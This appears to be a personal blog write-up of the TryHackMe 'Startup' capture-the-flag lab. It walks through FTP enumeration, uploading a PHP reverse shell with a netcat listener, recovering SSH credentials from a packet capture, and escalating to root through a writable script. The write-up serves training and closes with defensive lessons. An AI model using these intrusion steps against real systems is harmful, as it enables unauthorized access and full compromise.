Challenges: Startup (TryHackMe)

JebitokJebitok
4 min read

Welcome to Spice Hut, a quirky startup that sells spices and sandwiches—but more importantly, has questionable security practices. As part of a penetration testing engagement, our goal was to assess their infrastructure and attempt full system compromise. From initial enumeration to gaining root access, this box tested a wide range of fundamental skills, including service enumeration, steganography, reverse shells, PCAP analysis, and privilege escalation via weak scripting logic.

This write-up summarizes the full exploit chain used during the engagement, the vulnerabilities discovered, and key lessons learned throughout the process.

Welcome to Spice Hut!

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

Answer the questions below

  1. What is the secret spicy soup recipe?

    nmap -sC -sV IP_Address

    ftp IP_Address
    Anonymous

    get notice.txt

    get important.jpg

    cat notice.txt

     Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus
    

    sudo pip3 install capstone==4.0.2

    binwalk -e important.jpg

the image sort of a meme

we’re going to copy a reverse shell php file the upload it to ftp then we’ll use to get initial user access

cp /usr/share/webshells/php/php-reverse-shell.php shell.php

nano shell.php

edit the IP_Address and Port

log back to ftp then use this command:

ftp IP_Address

put shell.php

nc -lvnp 4444

go to the http://IP_Address/files/ftp/ and click on shell.php file

the shell will be reversed:

switch to fully interactive TTY shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

we found a recipe.txt file that reveals the recipe

  1. What are the contents of user.txt?

    back to ftp there’s an ftp folder that we had missed and checking the folder it has a pcapng file that will help us move on in this step

    ftp IP_Address

    get suspicious.pcapng

    open the pcappng file using Wireshark

    select one with TCP protocol and click on Analyze then select follow and TCP Stream then keep changing the streams, stream 7 and look through

we have a user called lennie and password, we can use ssh to access the user flag

ssh lennie@IP_Address

find / -type f -name user.txt 2> /dev/null

  1. What are the contents of root.txt?

cd scripts/

cat planner.sh

    #!/bin/bash 
    echo $LIST > /home/lennie/scripts/startup_list.txt
    /etc/print.sh

ls -lah /etc/print.sh

/etc$ chmod +x print.sh

/$ /tmp/rootbash -p

# find / -type f -name root.txt 2> /dev/null

Credits

Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!

Find my official writeup here: https://www.youtube.com/watch?v=3qNxI1OggGc

I'd like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.

I'd like to thank my testers Amit25095, BarZigmon and powershot.

Additionally, I'd love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.

And of course, I'd like to thank you for playing. Hope to see you soon!

This box was an excellent showcase of practical penetration testing skills. From basic enumeration and file analysis to privilege escalation via insecure script execution, Spice Hut reinforces the importance of:

  • Disabling anonymous FTP access in production environments.

  • Avoiding hardcoded or plaintext credentials.

  • Reviewing file and directory permissions, especially scripts run by privileged users.

  • Analyzing network captures for leaked sensitive information.

While the memes and quirky dialogue made the journey fun, the security flaws were very real—and could easily be exploited in a real-world scenario. Spice Hut has since taken your advice seriously, and with your help, they’ve now hired a proper security team. 🍜

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.